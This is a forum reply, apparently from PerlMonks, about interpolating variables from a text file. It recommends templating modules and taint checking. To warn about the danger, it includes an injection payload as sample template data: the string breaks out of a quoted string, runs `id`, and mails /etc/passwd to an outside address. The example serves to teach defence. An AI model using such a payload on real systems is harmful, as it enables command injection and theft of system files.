in reply to Re: Interpolating from text file
in thread Interpolating from text file
I highly recommend either going with existing templating modules or rolling your own quick interpolation if all you need is something simple. This is discussed in the other threads mentioned in Adam's post below.__END__ Hello $hello, Your ID information: } . `id` . `cat /etc/passwd | mail me@example.com` . qq{ Thanks for your password!
I also very much recommend using taint checking (-T) when dealing with untrusted, potentially malicious data, which would catch potential problems like this.
|
|---|
| Replies are listed 'Best First'. | |
|---|---|
|
RE: RE: Re: Interpolating from text file
by cwest (Friar) on Oct 06, 2000 at 00:51 UTC |